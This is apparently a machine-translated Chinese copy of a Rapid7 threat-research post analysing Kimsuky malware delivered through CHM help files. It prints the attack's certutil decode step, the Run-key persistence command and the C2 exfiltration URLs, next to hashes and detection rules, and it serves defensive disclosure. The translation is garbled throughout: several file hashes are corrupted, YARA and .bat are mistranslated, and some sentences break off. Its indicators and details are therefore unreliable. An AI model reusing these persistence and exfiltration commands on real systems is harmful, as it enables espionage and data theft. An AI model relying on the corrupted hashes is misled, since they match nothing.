最后更新于2024年3月21日星期四13:20:04 GMT
合著者是Christiaan Beek和Raj Samani
在 Rapid7实验室 我们持续跟踪和监控威胁组织. 这是我们重点关注的领域之一,因为我们努力确保我们保护客户的能力保持不变. 作为这个过程的一部分, 我们经常从威胁组织那里识别出不断演变的策略,这是一场无休止的猫捉老鼠游戏.
我们的团队最近发现了一些有趣的活动,我们认为这是 Kimsuky 威胁演员组织,也被称为黑女妖或铊. 起源于朝鲜,至少从2012年开始活跃, Kimsuky主要专注于情报收集. 据悉,该组织的目标是韩国政府机构, 与朝鲜半岛统一进程有关的个人, 以及与该政权利益相关的各个领域的全球专家. 近年来, Kimsuky的活动也扩展到整个亚太地区,影响到日本, 越南, 泰国, 等.
通过我们的研究, 我们看到了一份更新的剧本,强调了金苏基绕过现代安全措施的努力. 他们在战术上的演变, 技术, 和程序(TTPs)强调了网络间谍活动的动态性以及威胁行为者和防御者之间持续的军备竞赛.
在这篇博客中,我们将详细介绍最近几个月我们观察到的这个演员组使用的新技术. 我们相信,分享这些不断发展的技术可以让辩护人了解保护其资产所需措施的最新见解.
攻击的解剖
让我们首先强调一下我们从哪里开始对Kimsuky进行分析,以及我们调查得越多是如何开始的, 我们发现的越多,我们认为我们观察到了这个行动者的新一波攻击.
在确定目标后, 通常情况下,我们会预期侦察阶段将开始努力确定进入目标的方法. 既然金苏基的重点是情报收集, gaining access needs to remain undetected; subsequently, 入侵的目的是不触发警报.
多年来, 我们观察到这个群体的方法发生了变化, 从武器化的Office文件开始, ISO文件, 从去年开始, 滥用快捷文件(LNK文件). 通过将这些LNK文件伪装成良性文档或文件, 攻击者欺骗用户执行它们. PowerShell命令, 甚至是完整的二进制文件, 都隐藏在LNK文件中——所有这些都是为终端用户隐藏的,他们不会在地面上发现这些.
我们最新的发现让我们相信Kimsuky使用的是通过几种方式传递的CHM文件, 作为ISO|VHD|ZIP或RAR文件的一部分. 他们使用这种方法的原因是这样的容器有能力通过第一道防线,然后CHM文件将被执行.
CHM文件, 或编译的HTML帮助文件, 是微软开发的在线帮助文件的专有格式. 它们包含一组HTML页面和一个目录, 指数, 以及全文搜索功能. 本质上,CHM文件用于以结构化、可导航的格式显示帮助文档. 它们是使用Microsoft HTML帮助车间编译的,可以包含文本, 图片, 和超链接, 类似于网页, 都打包成一个单独的压缩文件 .chm扩展.
虽然最初是为帮助文档设计的, CHM文件也被用于恶意目的, 比如散布恶意软件, 因为它们可以在打开时执行JavaScript. CHM文件是一个小的存档文件,可以使用解压缩工具提取CHM文件的内容以进行分析.
我们分析中的第一个场景可以可视化如下:
核诱惑
在跟踪活动时,我们首先发现了一个引起我们注意的CHM文件.
| 哈希 | 价值 |
|---|---|
| MD5 | 364年d4fdf430477222fe854b3cd5b6d40 |
| SHA1 | b5224224fdbabdea53a91a96e9f816c6f9a8708c |
| SHA256 | c62677543eeb50e0def44fc75009a7748cdbedd0a3ccf62f50d7f219f6a5aa05 |
在受控环境中分析该文件, 我们观察到CHM文件包含以下文件和结构:
文件名的语言是韩语. 在翻译软件的帮助下,以下是文件名:
- 《pg电子》揭示了北韩的核战略.html
- 不完整的.html
- 朝鲜使用核武器的因素和类型.html
- 朝鲜核危机升级模型与核使用决定因素.html
- 介绍.html
- 过往研究回顾.html
- 研究背景与目的.html
这些HTML文件链接到主HTML文件' home '.Html ' -我们稍后将返回此文件.
每种文件类型都有其独特的特征, 从文件取证的角度来看,我们来看看文件的头文件:
| 价值 | 价值 | 评论 |
|---|---|---|
| 0x49545346 | ITSF | CHM文件的文件头ID |
| 0x03 | 3 | 版本号 |
| --- | --- | --- |
| 跳过 | ||
| --- | --- | --- |
| 0x1204 | 0412 | Windows语言ID |
| --- | --- | --- |
0412作为语言ID的值为“Korean - Korea”。. 这可以翻译为用于创建此CHM文件的Windows操作系统使用韩国语.
当CHM文件被执行时,它将显示以下内容:
右窗格中的页面是“主页”.html的文件. 这个页面包含了一段有趣的代码:
所提供的代码片段是一个使用HTML和ActiveX在Windows机器上执行任意命令的示例, 通常用于恶意目的. 分配给“Button”的值包含一个带有Base64代码的命令行,作为另一种混淆技术,然后是一种生活技术, 从而在受害者的系统上创建持久性以运行内容.
让我们将其分解并理解演员在做什么:
- Base64编码的VBScript执行(T1059.003):
- 回声T24gRXJyb3IgUmVzdW1lIE5leHQ...: 这部分将base64编码的字符串回显到文件中. 该字符串经过解码后就是VBScript代码. VBScript被设计成在受害者的机器上执行. 解码后的Base64值为:
2. 储蓄到a .dat文件:
- >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat”: 返回的Base64字符串被重定向并保存到 .当前用户的链接目录下的dat文件. 文件名似乎是随机生成或混淆的,以避免容易检测.
3. 解码 .dat文件:
- start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat”“% USERPROFILE % \ \ MXFhejJ3c3gzZWRjA的链接.根据“:它使用certutil实用程序(一个合法的Windows工具)来解码base64编码的 .将数据文件还原为 .vbs (VBScript)文件. /MIN标志开始的过程最小化,以减少怀疑.
4. 通过注册表修改实现持久性(T1547).001)
- :start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.根据“/ f: 这将为当前用户在Windows注册表的Run键下添加一个新条目(HKCU代表HKEY_CURRENT_USER)。. Windows使用这个注册表路径来确定哪些程序应该在启动时自动运行. 该命令确保每次用户登录时都运行解码的VBScript, 在受感染的系统上实现持久性.
但是从URL下载的内容,解码并写入该VBS文件? 命令和控制服务器的URL承载了一个包含VBS代码的HTML页面:
分析代码,它在受害者的机器上做了几件事:
函数' SyInf() '使用WMI (Windows Management Instrumentation)收集基本的系统信息,并构造一个包含所有这些细节的字符串. 收集的内容:
- 计算机名称,所有者,制造商,型号,系统类型.
- 操作系统详细信息,版本,构建号,总可见内存.
- 处理器细节,包括标题和时钟速度.
代码中的其他函数收集系统上正在运行的进程, 最近的Word文件, 并列出特定文件夹的目录和文件. 在我们的示例中,参与者对Downloads文件夹的内容感兴趣.
从代码中收集到所请求的信息后, 它全部以Base64格式编码, 存储在文件“info”中.Txt’,并被泄露到远程服务器:
ui = "00701111.000年webhostapp.com/wp-extra”
发送信息后,C2使用以下消息进行响应:
这个C2服务器仍然处于活动状态,尽管我们从2023年9月开始就看到了活动, 我们还观察到了2024年的活动.
发现新活动
在“偷窃代码”中旋转一些独特的字符串,并寻找更多的CHM文件, 我们发现了更多的文件——一些也可以追溯到2023年下半年, 还有2024年的热门歌曲.
在VirusTotal中,我们发现了以下文件:
| 哈希 | 价值 |
|---|---|
| MD5 | 71年db2ae9c36403cec1fd38864d64f239 |
| SHA1 | 5 c7b2705155023e6e438399d895d30bf924e0547 |
| SHA256 | e8000ddfddbe120b5f2fb3677abbad901615d1abd01a0de204fade5d2dd5ad0d |
| ------------- | ------------------- |
该文件是一个VBS脚本,它包含与我们前面在上面的信息收集脚本中描述的类似的代码. 许多组件是相同的,只是收集的数据类型略有不同.
最大的区别是不同的C2服务器,这是有道理的. 下面是VBS脚本运行时的完整路径,并将路径进行了连接:
hxxp: / / gosiweb.gosiclass [.] com/m/gnu/convert/html/com/list.php?查询= 6
代码和工具的使用方式和重用表明,威胁行为者正在积极使用和改进/重塑其技术和策略,以从受害者那里收集情报.
更? 是的,发现了另一种方法
使用先前发现的CHM文件的特征, 我们制定了雅拉内部的狩猎规则, 从中我们发现了以下CHM文件:
| 哈希 | 价值 |
|---|---|
| MD5 | f35b05779e9538cec363ca37ab38e287 |
| SHA1 | d4fa57f9c9e35222a8cacddc79055c1d76907fb9 |
| SHA256 | da79eea1198a1a10e2ffd50fd949521632d8f252fb1aadb57a45218482b9fd89 |
| ---- | --- |
在这个特殊的例子中,是倍数 .存在VBS文件和VBS脚本。
以类似的方式,目录中的HTML文件包含隐藏代码:
style="visibility:hidden;"> 执行CHM文件后,将删除目录中的所有文件 C: \ \ \公共\ \图书馆\ \用户 目录 然后开始奔跑. 首先使用“\2034923”创建持久性计划任务.蝙蝠”文件: VBS脚本会先创建一个Service,再创建另一个Service .Bat文件被执行,每个文件都有不同的函数. “9583423.Bat”脚本将从系统中收集信息并将其存储在文本文件中: 在上面的代码中,当收集信息时,该文件由' 1295049 '调用.蝙蝠的脚本, 其中包含Powershell代码,以设置与C2服务器的正确路径的连接, Base64编码流, 和转让: 结合前面的代码 .bat文件和下面的代码,创建到C2的路径: hxxps: / / niscarea [.] com/in.php?cn = [base64]&fn = [DateTime] 收集到的包含系统信息的文件将被Base64编码, 拉上拉链,送到C2. 发送后,文件将从本地系统中删除. 的系统.txt文件将包含有关受害者系统的信息,如操作系统,CPU架构等. 以下是内容的一个简短示例: 这种攻击的整体流程可以在这个可视化中简化: 由于这是一项积极的运动,因此在撰写本文时,跟踪流行情况是基于的. 然而, Rapid7实验室遥测技术使我们能够确认我们已经确定了针对韩国实体的目标攻击. 此外, 当我们应用我们的方法来确定归因时,例如代码和战术的重叠, 我们有一定的信心把这次行动归功于Kimsuky集团. 所有的ioc都可以在我们的网站上免费获得 这里是Rapid7实验室存储库. 通过Rapid7扩展的检测规则库,insighttidr和管理检测与响应(耐多药)客户已经拥有了现有的检测覆盖范围. Rapid7建议在所有适用的主机上安装Insight Agent,以确保对可疑进程的可见性和适当的检测覆盖率. 以下是与这些技术和研究相关的检测和警报活动的非详尽列表: 持久性-运行键由Reg添加.exe 可疑程序- HH.生成子进程 可疑进程- CHM文件运行CMD.运行Certutil . exe 持久化- vbs脚本添加到注册表运行键中 *在威胁研究术语中, “moderate confidence” means that we have a significant amount of evidence that the activity we are observing is similar to what we have observed from a specific group or actor in the past; however, 总是有可能有人在模仿你的行为. 因此,我们使用“中等”而不是“高”信心.
攻击的发生率
Rapid7客户
